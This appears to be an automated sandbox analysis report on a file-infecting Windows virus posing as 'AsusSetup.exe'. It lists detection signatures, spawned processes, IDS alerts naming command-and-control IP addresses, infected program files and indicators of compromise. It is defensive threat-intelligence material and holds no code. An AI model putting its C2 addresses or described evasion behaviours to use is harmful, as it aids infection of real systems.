Windows Analysis Report
AsusSetup.exe

Overview

General Information

Sample name:AsusSetup.exe
Analysis ID:1543957
MD5:13bf2819401d2f983fff90c1960831b8
SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
Tags:exe, Expiro, user-lschab
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Binary contains a suspicious time stamp
Connects to many different domains
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AsusSetup.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\AsusSetup.exe" MD5: 13BF2819401D2F983FFF90C1960831B8)
  • armsvc.exe (PID: 6612 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: B304B3F52DE20CFC59D49162F1E99EEA)
  • alg.exe (PID: 6732 cmdline: C:\Windows\System32\alg.exe MD5: 0E2255EDBB351BDA0949D09F88FA226E)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 6996 cmdline: C:\Windows\system32\AppVClient.exe MD5: 8DF9B4C3E64A3509DEE72C0E8333DDA6)
  • FXSSVC.exe (PID: 6104 cmdline: C:\Windows\system32\fxssvc.exe MD5: 0EC424B89B232FD9D839942FBC5274E2)
  • maintenanceservice.exe (PID: 1748 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: DF7731CD51167F1E9F73863D919CAC1B)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Timestamp                        SID      Severity  Classtype                                      Source IP       Source Port  Destination IP  Destination Port  Protocol
2024-10-28T16:39:08.047629+0100  2051654  1         A Network Trojan was detected                  192.168.2.4     50839        1.1.1.1         53                UDP
2024-10-28T16:38:36.094787+0100  2051651  1         A Network Trojan was detected                  192.168.2.4     60487        1.1.1.1         53                UDP
2024-10-28T16:39:02.026892+0100  2051653  1         A Network Trojan was detected                  192.168.2.4     53838        1.1.1.1         53                UDP
2024-10-28T16:37:11.575918+0100  2051649  1         A Network Trojan was detected                  192.168.2.4     58296        1.1.1.1         53                UDP
2024-10-28T16:37:10.083474+0100  2051648  1         A Network Trojan was detected                  192.168.2.4     53248        1.1.1.1         53                UDP
2024-10-28T16:37:06.202513+0100  2018141  1         A Network Trojan was detected                  54.244.188.177  80           192.168.2.4     49732             TCP
2024-10-28T16:37:07.760195+0100  2018141  1         A Network Trojan was detected                  18.141.10.107   80           192.168.2.4     49733             TCP
2024-10-28T16:37:10.047679+0100  2018141  1         A Network Trojan was detected                  44.221.84.105   80           192.168.2.4     49738             TCP
2024-10-28T16:37:35.211531+0100  2018141  1         A Network Trojan was detected                  47.129.31.212   80           192.168.2.4     49752             TCP
2024-10-28T16:37:36.856537+0100  2018141  1         A Network Trojan was detected                  13.251.16.150   80           192.168.2.4     49753             TCP
2024-10-28T16:37:42.766102+0100  2018141  1         A Network Trojan was detected                  18.208.156.248  80           192.168.2.4     49759             TCP
2024-10-28T16:37:49.539296+0100  2018141  1         A Network Trojan was detected                  35.164.78.200   80           192.168.2.4     49764             TCP
2024-10-28T16:37:50.475191+0100  2018141  1         A Network Trojan was detected                  3.94.10.34      80           192.168.2.4     49765             TCP
2024-10-28T16:38:02.711736+0100  2018141  1         A Network Trojan was detected                  18.246.231.120  80           192.168.2.4     49787             TCP
2024-10-28T16:38:13.503761+0100  2018141  1         A Network Trojan was detected                  34.211.97.45    80           192.168.2.4     49850             TCP
2024-10-28T16:38:17.064873+0100  2018141  1         A Network Trojan was detected                  3.254.94.185    80           192.168.2.4     49873             TCP
2024-10-28T16:38:27.780922+0100  2018141  1         A Network Trojan was detected                  34.246.200.160  80           192.168.2.4     49935             TCP
2024-10-28T16:37:06.202513+0100  2037771  1         A Network Trojan was detected                  54.244.188.177  80           192.168.2.4     49732             TCP
2024-10-28T16:37:07.760195+0100  2037771  1         A Network Trojan was detected                  18.141.10.107   80           192.168.2.4     49733             TCP
2024-10-28T16:37:10.047679+0100  2037771  1         A Network Trojan was detected                  44.221.84.105   80           192.168.2.4     49738             TCP
2024-10-28T16:37:35.211531+0100  2037771  1         A Network Trojan was detected                  47.129.31.212   80           192.168.2.4     49752             TCP
2024-10-28T16:37:36.856537+0100  2037771  1         A Network Trojan was detected                  13.251.16.150   80           192.168.2.4     49753             TCP
2024-10-28T16:37:42.766102+0100  2037771  1         A Network Trojan was detected                  18.208.156.248  80           192.168.2.4     49759             TCP
2024-10-28T16:37:49.539296+0100  2037771  1         A Network Trojan was detected                  35.164.78.200   80           192.168.2.4     49764             TCP
2024-10-28T16:37:50.475191+0100  2037771  1         A Network Trojan was detected                  3.94.10.34      80           192.168.2.4     49765             TCP
2024-10-28T16:38:02.711736+0100  2037771  1         A Network Trojan was detected                  18.246.231.120  80           192.168.2.4     49787             TCP
2024-10-28T16:38:13.503761+0100  2037771  1         A Network Trojan was detected                  34.211.97.45    80           192.168.2.4     49850             TCP
2024-10-28T16:38:17.064873+0100  2037771  1         A Network Trojan was detected                  3.254.94.185    80           192.168.2.4     49873             TCP
2024-10-28T16:38:27.780922+0100  2037771  1         A Network Trojan was detected                  34.246.200.160  80           192.168.2.4     49935             TCP
2024-10-28T16:37:07.754028+0100  2850851  1         Malware Command and Control Activity Detected  192.168.2.4     49733        18.141.10.107   80                TCP
2024-10-28T16:38:08.321137+0100  2850851  1         Malware Command and Control Activity Detected  192.168.2.4     49824        34.211.97.45    80                TCP

AV Detection

Source: AsusSetup.exe, Avira: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Joe Sandbox ML: detected
Source: AsusSetup.exe, Joe Sandbox ML: detected
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.1693327541.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2080481353.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2057462608.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
